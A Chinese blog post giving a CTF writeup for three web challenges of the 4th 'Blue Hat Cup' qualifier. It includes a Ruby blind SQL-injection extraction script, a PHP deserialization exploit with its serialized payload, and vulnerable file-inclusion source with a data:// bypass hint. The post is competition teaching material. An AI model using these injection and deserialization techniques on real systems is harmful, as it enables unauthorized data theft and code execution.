第四届“蓝帽杯”线上初赛writeup 2 min read
|
2,607
|
0
|
CTF

152 字
|
1 分钟内
本文最后更新于 659 天前,其中的信息可能已经有所发展或是发生改变。

Author:颖奇L’Amore

Blog:www.gem-love.com

easiestSQLi

布尔盲注+二分注入

#!/usr/bin/ruby -w
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore

require "open-uri"
result = ''
1000.times do |i|
  low = 32
  high = 128
  mid = ( low + high ) / 2
  while low < high
    url = "http://[your_docker_container].cloudeci1.ichunqiu.com/?id=1=((ascii(substr((select(flag)from(flag)),#{i+1},1)))>#{mid})"
    res = nil
    open(url) do |http|
      res = http.read
    end
    if res['AGAIN'] === nil
      low = mid + 1
    else
      high = mid
    end
    mid = ( low + high ) / 2
    if mid == 32 or mid == 127
      break
    end
  end
  result += mid.chr
  puts result
end
Inclusion

读源码找类和反序列化位点

<?php
class Seri{
    public $alize;
    public function __construct($alize) {
        $this->alize = $alize;
    }
    public function __destruct(){
        $this->alize->getFlag();
    }
}

class Flag{
    public $f;
    public $t1;
    public $t2;

    function __construct($file){
        echo "Another construction!!";
        $this->f = $file;
        $this->t1 = $this->t2 = md5(rand(1,10000));
    }

    public function getFlag(){
        $this->t2 = md5(rand(1,10000));
        echo $this->t1;
        echo $this->t2;
        if($this->t1 === $this->t2)
        {
            if(isset($this->f)){
                echo @highlight_file($this->f,true);
            }
        } else {
            echo "no";
        }
    }
}
$p = $_GET['p'];
if (isset($p)) {
    $p = unserialize($p);
} else {
    echo "NONONO";
}
?>

1/10000的成功率,发10000个包爆破有很大概率能够得到flag

利用指针即可,exp:

<?php
class Seri{
    public $alize;
    function __construct()
    {
        $this->alize = new Flag;
    }
}

class Flag{
    public $f;
    public $t1;
    public $t2;
    function __construct(){
        $this->t2 = md5(rand(1,10000));
        $this->t1 = &$this->t2;
        $this->f = 'flag.php';
    }
}
$seri = new Seri();
echo serialize($seri); 
//O:4:"Seri":1:{s:5:"alize";O:4:"Flag":3:{s:1:"f";s:8:"flag.php";s:2:"t1";s:32:"1a336426e09602a4f0118326dd6c72ac";s:2:"t2";R:4;}}
Soitgoes

可以用php wrapper,但是过滤了base、rot、string等关键字。利用平时不常见的过滤器读flag.php源码即可

文件包含绕过

vim临时文件得到源码

<?php
    header("Content-type: text/html; charset=utf-8");
    echo "该死,我的电脑总断电,还好编辑器能帮我恢复,吓死惹";
    stream_wrapper_unregister('php');

    $seperate = bin2hex(rand(1,1000000));


    $mkdir = function($dir) {
        system('mkdir -p '.escapeshellarg($dir));
    };

    $mkdir('users/'.$seperate);
    chdir('users/'.$seperate);

    function getIp(){
        $ip = '';
        if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
            $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        }elseif(isset($_SERVER['HTTP_CLIENT_IP'])){
            $ip = $_SERVER['HTTP_CLIENT_IP'];
        }else{
            $ip = $_SERVER['REMOTE_ADDR'];
        }
        $ip_arr = explode(',', $ip);
        return $ip_arr[0];
    }

    $curf = getIp();
    $curf = basename(str_replace('.','',$curf));
    $curf = basename(str_replace('-','',$curf));


    $mkdir($curf);
    chdir($curf);
    file_put_contents('res',print_r($_SERVER,true));
    chdir('..');
    $_GET['page']=str_replace('.','',$_GET['page']);
    if(!stripos(file_get_contents($_GET['page']),'<?') && !stripos(file_get_contents($_GET['page']),'php')) {
        include($_GET['page']);
    }

    chdir(__DIR__);
    system('rm -rf users/'.$seperate);

?>

利用file_get_contents()include()时对于data协议处理的差异,即可绕过waf、包含并RCE

颖奇L'Amore原创文章,转载请注明作者和文章链接

本文链接地址:https://blog.gem-love.com/ctf/2549.html

注:本站定期更新图片链接,转载后务必将图片本地化,否则图片会无法显示

打赏分享
暂无评论

发送评论 编辑评论

 
 
 
 
 
 
 
  
   
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
  
上一篇
下一篇